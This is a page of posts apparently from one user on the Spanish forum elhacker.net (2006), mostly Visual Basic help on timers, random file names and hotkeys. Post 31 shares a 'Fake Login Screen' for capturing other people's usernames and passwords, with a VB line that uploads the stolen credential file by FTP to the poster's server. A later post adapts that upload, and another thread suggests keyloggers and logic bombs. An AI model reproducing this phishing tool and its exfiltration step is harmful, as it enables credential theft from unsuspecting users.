elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9
31  Programación / Programación Visual Basic / Sencillo pero útil Fake Login Screen en: 28 Octubre 2006, 18:04 pm
Lo hice hace un tiempo y por lo visto me fue muy pero que muy bien  ;D Y como me lo pidieron por otro subforo subo el codigo en VB, solo hay que ajustarlo a vuestras preferencias y compilarlo...

http://www.flypicture.com?display=updone&id=qNrwland

Si quieres que el programa suba el .txt que contendrá los user y passwords, tendréis que añadir el componente llamado "Microsoft Internet Tranfer Control 6.0" y añadir este simple códgio:

Código:
Inet1.Execute "ftp://usuario:contraseña@ftp.usuarios.lycos.es (aqui el nombre de dominio de vuestro proveedor ftp, en mi caso es lycos)", "PUT information.txt " & "information.txt"

AVISO: Con FTP´s de No-ip no funciona...

salu2

32  Informática / Tutoriales - Documentación / Re: REPARE Y CONOZCA SU PC (CURSO) en: 14 Octubre 2006, 00:03 am
Sé que responder a post con 2 o 3 semanas de antigüedad va contra las reglas del foro...pero el link está roto, y es el único tuto de estas características que se podría encontrar en el foro...

Tal vez ya no exista la página...en este caso le importaría a alguien postear algún enlace relacionado con este tema?

Gracias.
33  Programación / Programación Visual Basic / Re: Guardar .txt con nombre aleatorio (¿random?) en: 9 Octubre 2006, 22:06 pm
Bien, gracias por los codes, me funcionan de maravilla. Esto último ya es un capricho de mi aplicación: Resulta que después de haber creado el archivo necesito que lo suba a mi FTP, y no se como hacer referencia al nombre aleatorio:

Código:
"PUT palabraleatoria.txt " & "palabraleatoria.txt"

Se supone que apartir de PUT ya no importa lo que pongas porque VB lo va coger como simple texto no??  :huh:
34  Programación / Programación Visual Basic / Re: Ejecutar aplicación mediante teclas en: 9 Octubre 2006, 21:39 pm
Citar
Lo que tendrias que hacer es dejar el programa en el registro, y que estuviese corriendo todo el rato (supongo que te consumiria muchos recursos)...

Sí, ese es el problema...se me ocurrió hacerlo y después al pulsar una tecla hacer el form visible, pero ralentizaba muxo la pc.

Citar
Buscate codes de Bombas Lógicas y Keyloggers simples.

Me acabo de mirar eso de las bombas lógicas, y por lo que veo es algo parecido a un virus destructivo...intentaré hacer lo que me as dicho con la sentencia case (muxas veces la olvido, xd), al pulsar la tecla determinada activaré el "consumo de recursos" según case.

salu2
35  Programación / Programación Visual Basic / Guardar .txt con nombre aleatorio (¿random?) en: 9 Octubre 2006, 18:29 pm
Necesito hacer que una aplicación guarde ficheros .txt con un nombre al azar, de manera que nunca se creen 2 .txt´s con el mismo nombre. Tengo este code:

Código:
Open ("nombre_al_azar.txt") For Output As #1

Utilicé la función random para otras cosas pero nunca para esto  :huh: Me vale también si el nombre del difchero están compuesto por un número...lo único que se me ocurre es crear un variable que vaya creciendo según el timer...pero nosé si estaría correcto  :huh:


De antemano gracias, y salu2 para los miembros del foro
36  Programación / Programación Visual Basic / Re: Cambiar el Interval de milisegundos a segundos en: 8 Octubre 2006, 17:35 pm
Ok, de esa manera no lo había pensado. Yo lo que hice fue poner cuantos timers necesitaba (cada uno de ellos al valor máximo [cerca de 65000]. Y después mediante if´s cancelar uno y activar otro...así sucesivamente hasta ejecutar la instrucción...y finalmente pues queda una chapuzilla
también xD

Y digo yo...porque no hacen un timer con más duración??  O tal vez haya alguna ocx por ahi y no nos hemos dado cuenta xd
37  Programación / Programación Visual Basic / Cambiar el Interval de milisegundos a segundos en: 8 Octubre 2006, 14:19 pm
No me acepta valores con más de 5 cifras...hay alguna forma para que lo haga?

De antemano gracias.
38  Programación / Programación Visual Basic / Re: Ejecutar aplicación mediante teclas en: 8 Octubre 2006, 00:06 am
Conseguí más o menos lo que quería (sin tocar el registro). Lo comento por si a alguien le sirve:

-Creáis un acceso directo de la aplicación que queréis ejecutar mediante una combinación te teclas.

-Después dais click derecho encima del acceso directo y clickais sobre "Propiedades".

-Le dais el foco al textbox que al lado tiene un label en el que dice "Teclado de método abreviado". Y aquí pulsáis la combinación de teclas mediante las cuales queréis que se ejecute la aplicación (procurad que no estén cogidas por Windows).

Si alguien sabe hacerlo mediante el registro que lo diga  ;)

salu2
39  Programación / Programación Visual Basic / Re: Ejecutar aplicación mediante teclas en: 7 Octubre 2006, 22:40 pm
Bien, pero se me olvidó comentar que la aplicación debería ejecutarse sin haber sido ejecutada previamente (una autoejecución mediante unas determinadas teclas programadas por tí).

Es posible hacer esto último?  :huh:
40  Programación / Programación Visual Basic / Ejecutar aplicación mediante teclas en: 7 Octubre 2006, 22:15 pm
Se podría hacer una aplicación que ejecutase una aplicación situada en un path al pulsar una(s) tecla(s) programadas por tí? De ser así cual sería el code?

Gracias.
Páginas: 1 2 3 [4] 5 6 7 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines